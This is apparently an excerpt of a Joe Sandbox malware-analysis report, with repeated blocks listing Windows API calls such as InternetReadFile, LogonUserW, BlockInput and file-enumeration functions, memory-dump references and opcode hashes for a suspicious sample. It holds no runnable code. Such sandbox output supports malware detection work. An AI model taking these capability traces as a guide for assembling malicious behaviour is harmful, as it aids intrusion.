                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,76233220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3397143404-0
                                                                                                                            • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                            • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                            • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                            • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: ACCEPT$^$h
                                                                                                                            • API String ID: 909875538-4263704089
                                                                                                                            • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                            • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                                            • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                            • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                                            APIs
                                                                                                                            • _set_new_mode.LIBCMT ref: 0040D88C
                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D8B9
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040D8CE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeInfoLibraryParametersSystem_set_new_mode
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 1188159508-554117064
                                                                                                                            • Opcode ID: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                                                                            • Instruction ID: 2b4412acdce639bfbf0f9e0c9ecf3f694f94d165ded01d265c3c64edb54a61d9
                                                                                                                            • Opcode Fuzzy Hash: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                                                                            • Instruction Fuzzy Hash: C2215EB19183009FC700EF56D88150ABBE4FB98354F44497EF849A72A2D735A945CB9A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                                                            • API String ID: 0-2165971703
                                                                                                                            • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                            • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                                                            • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                            • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3541575487-0
                                                                                                                            • Opcode ID: 389ad529d810a64bb0ac3ba1ac38a0637fa5927c4fe4527bdd92752c01277f73
                                                                                                                            • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                                                            • Opcode Fuzzy Hash: 389ad529d810a64bb0ac3ba1ac38a0637fa5927c4fe4527bdd92752c01277f73
                                                                                                                            • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 48322524-0
                                                                                                                            • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                            • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                                                            • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                            • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                                                            APIs
                                                                                                                            • __time64.LIBCMT ref: 004433A2
                                                                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                            • String ID: rJ
                                                                                                                            • API String ID: 2893107130-1865492326
                                                                                                                            • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                            • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                                            • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                            • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                                            APIs
                                                                                                                            • __time64.LIBCMT ref: 004433A2
                                                                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                            • String ID: rJ
                                                                                                                            • API String ID: 2893107130-1865492326
                                                                                                                            • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                            • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                                            • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                            • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                                            APIs
                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 901099227-0
                                                                                                                            • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                            • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                                            • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                            • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                            • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                                            • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                            • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0vH$HH
                                                                                                                            • API String ID: 0-728391547
                                                                                                                            • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                            • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                            • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                            • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                            • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                                            • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                            • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                                            APIs
                                                                                                                            • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Proc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2346855178-0
                                                                                                                            • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                            • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                            • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                            • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                            APIs
                                                                                                                            • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockInput
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3456056419-0
                                                                                                                            • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                            • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                            • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                            • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                            APIs
                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LogonUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1244722697-0
                                                                                                                            • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                            • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                            • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                            • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NameUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2645101109-0
                                                                                                                            • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                            • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                            • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                            • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                            • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                            • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                            • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
